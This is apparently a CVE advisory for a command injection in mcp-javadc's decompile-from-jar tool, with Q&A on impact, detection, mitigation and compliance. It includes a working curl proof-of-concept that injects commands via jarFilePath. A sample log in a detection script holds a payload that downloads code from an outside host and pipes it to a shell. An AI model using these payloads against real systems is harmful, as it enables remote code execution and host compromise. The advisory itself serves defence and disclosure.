CVE-2026-5802
Status: Received - Intake
OS Command Injection in idachev MCP-JavaDC HTTP Interface

Publication date: 2026-04-08

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability was identified in idachev mcp-javadc up to version 1.2.4. An unknown function of the component HTTP Interface is affected. Manipulation of the argument jarFilePath leads to OS command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.
Meta Information
Published: 2026-04-08
Last Modified: 2026-04-29
Generated: 2026-05-06
AI Q&A: 2026-04-08
EPSS Evaluated: 2026-05-05
Affected Vendors & Products (1 associated CPE)
Vendor: idachev
Product: mcp-javadc
Version / Range: up to and including 1.2.4
CWE
CWE-77 (Command Injection): The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 (OS Command Injection): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5802 is a command injection vulnerability in the idachev mcp-javadc project up to version 1.2.4. It arises from unsafe handling of the jarFilePath argument in the decompile-from-jar tool exposed via the MCP/HTTP interface. The jarFilePath parameter is directly embedded into shell commands without proper sanitization, allowing an attacker to inject arbitrary OS commands.

An attacker with network access to the MCP/HTTP interface can remotely execute arbitrary system commands with the privileges of the server process by crafting malicious requests that break out of the quoted shell command context.

The public exploit demonstrates this by injecting `id`, whose output reveals the account the server runs as and confirms that arbitrary commands execute on the host.


How can this vulnerability impact me?

This vulnerability can have severe impacts, up to full host compromise. An attacker who can reach the interface executes arbitrary commands with the privileges of the mcp-javadc server process, which can lead to:

  • Confidentiality loss: reading sensitive files, secrets, environment variables, and any data accessible to the server.
  • Integrity loss: modifying files, configurations, or downstream systems the server can reach.
  • Availability disruption: disrupting services, consuming resources, or executing destructive commands.

Because the injected commands run as the server process, the impact covers everything that process can reach on the host (or container) where mcp-javadc runs; if the server runs as root or outside a sandbox, this amounts to a complete compromise of that system.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

The injection can be confirmed by exercising it through the vulnerable HTTP interface: send a JSON-RPC request whose method is `tools/call`, naming the `decompile-from-jar` tool and supplying a crafted `jarFilePath` argument. This is an active test that runs a command on the target, so only use it against systems you are authorized to test.

The proof of concept injects a harmless command such as `id` and checks whether its output comes back in the response.

Example probe using curl. The URL path is a placeholder: the real path depends on where the server mounts its MCP HTTP transport, and some transports require an `Accept` header, an `initialize` exchange or a session id before `tools/call` is accepted, so adapt the request to the deployment:

  • curl -X POST http://<target-host>/tools/call -H 'Content-Type: application/json' -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"decompile-from-jar","arguments":{"jarFilePath":"/tmp/a\" ; id >&2 ; \"","className":"com.example.Foo"}}}'

If the response or the tool's error output contains `uid=...` output from `id`, the command injection is confirmed. The `"` in the payload closes the quoted argument in the shell command and `;` starts a new command; `>&2` sends the `id` output to stderr so it shows up in the error message even if stdout is discarded. Less intrusive checks: any installed mcp-javadc at or below version 1.2.4 should be treated as affected, and request logs can be searched for `jarFilePath` values containing quotes, semicolons, pipes, `$(` or backticks.
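The following Node.js script is an added example, not code from mcp-javadc or from this advisory. It applies the same check offline: it scans constructed sample request logs (one JSON-RPC request per line, an assumed format) for `decompile-from-jar` calls whose `jarFilePath` carries shell metacharacters, builds the probe body shown above, and recognises `id` output in a response.

```javascript
// Added example (not mcp-javadc or advisory code): offline triage of request logs
// for CVE-2026-5802 injection attempts, plus construction and evaluation of the probe.
// Log format is an assumption: one JSON-RPC request object per line.

// Characters that can break out of a quoted `sh -c` string or start a new command.
const SHELL_META = /["'`;&|$<>(){}\n\\]/;

// Constructed sample log: a tools/list call, one benign decompile, two injection
// attempts (the advisory's PoC and a command-substitution variant) and a junk line.
const SAMPLE_LOG = [
  '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}',
  '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"decompile-from-jar","arguments":{"jarFilePath":"/opt/libs/app.jar","className":"com.example.Foo"}}}',
  '{"jsonrpc":"2.0","id":3,"method":"tools/call","params":{"name":"decompile-from-jar","arguments":{"jarFilePath":"/tmp/a\\" ; id >&2 ; \\"","className":"com.example.Foo"}}}',
  '{"jsonrpc":"2.0","id":4,"method":"tools/call","params":{"name":"decompile-from-jar","arguments":{"jarFilePath":"/tmp/x.jar$(curl http://203.0.113.5/p|sh)","className":"a.B"}}}',
  'not json at all',
].join('\n');

// Parse every tools/call request out of the log, skipping lines that are not JSON.
function parseToolCalls(logText) {
  const calls = [];
  for (const line of logText.split('\n')) {
    let msg;
    try { msg = JSON.parse(line); } catch { continue; }
    if (!msg || msg.method !== 'tools/call') continue;
    calls.push({ id: msg.id, name: msg.params?.name, args: msg.params?.arguments ?? {} });
  }
  return calls;
}

// Heuristic: a legitimate jarFilePath is a plain string naming a .jar and contains
// nothing the shell would interpret. Anything else is worth a closer look.
function isSuspiciousJarPath(p) {
  if (typeof p !== 'string') return true;
  if (SHELL_META.test(p)) return true;
  if (!p.toLowerCase().endsWith('.jar')) return true;
  return false;
}

// Return the decompile-from-jar calls whose jarFilePath looks like an injection attempt.
function findInjectionAttempts(logText) {
  return parseToolCalls(logText)
    .filter(c => c.name === 'decompile-from-jar' && isSuspiciousJarPath(c.args.jarFilePath))
    .map(c => ({ id: c.id, jarFilePath: c.args.jarFilePath }));
}

// Build the probe body from the advisory's PoC. `id >&2` writes to stderr so the
// result surfaces in the tool's error text even when stdout is discarded.
function buildProbeRequest(id = 1) {
  return {
    jsonrpc: '2.0',
    id,
    method: 'tools/call',
    params: {
      name: 'decompile-from-jar',
      arguments: { jarFilePath: '/tmp/a" ; id >&2 ; "', className: 'com.example.Foo' },
    },
  };
}

// `id` prints `uid=<n>(<name>) gid=...`; seeing that in a response confirms execution.
function confirmsExecution(responseText) {
  return /\buid=\d+\(/.test(String(responseText));
}

console.log('flagged requests:', findInjectionAttempts(SAMPLE_LOG));
console.log('probe body:', JSON.stringify(buildProbeRequest()));
```

Point `findInjectionAttempts` at a real request log to hunt for past attempts; `buildProbeRequest` produces the exact JSON the curl command above sends, and `confirmsExecution` is what to run over the HTTP response body.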


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting or disabling access to the vulnerable MCP/HTTP interface to prevent remote exploitation.

Implement network-level controls such as firewall rules or access control lists to limit access to trusted users only.

If possible, temporarily disable or block the `decompile-from-jar` tool (or reject all `tools/call` requests) until a fixed release is available.

Apply application-level mitigations such as:

  • Remove free-form shell command execution from request handlers.
  • Replace direct shell execution with a fixed allowlist of commands and strict argument validation.
  • Use safer Node.js APIs like `spawn` or `execFile` with argument arrays and without `shell: true`.
  • Implement authentication, authorization, audit logging, and rate limiting on sensitive MCP/HTTP endpoints.

Monitor request logs for `tools/call` invocations of `decompile-from-jar` whose `jarFilePath` contains quotes, semicolons, pipes, `$(` or backticks, and watch for unexpected child processes (for example `sh -c`) spawned by the Node.js server process.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows remote attackers to execute arbitrary system commands on the affected host, leading to full host compromise. This includes the ability to read sensitive files, secrets, environment variables, and accessible data, as well as modify files and disrupt services.

Such unauthorized access and control over the system can result in breaches of confidentiality, integrity, and availability of data, which are critical requirements under common standards and regulations like GDPR and HIPAA.

Specifically, the exposure of sensitive personal data or protected health information due to this vulnerability could lead to non-compliance with GDPR's data protection principles and HIPAA's security rules, potentially resulting in legal and financial penalties.

Therefore, until this vulnerability is mitigated, systems using the affected software may be at risk of violating these compliance requirements.

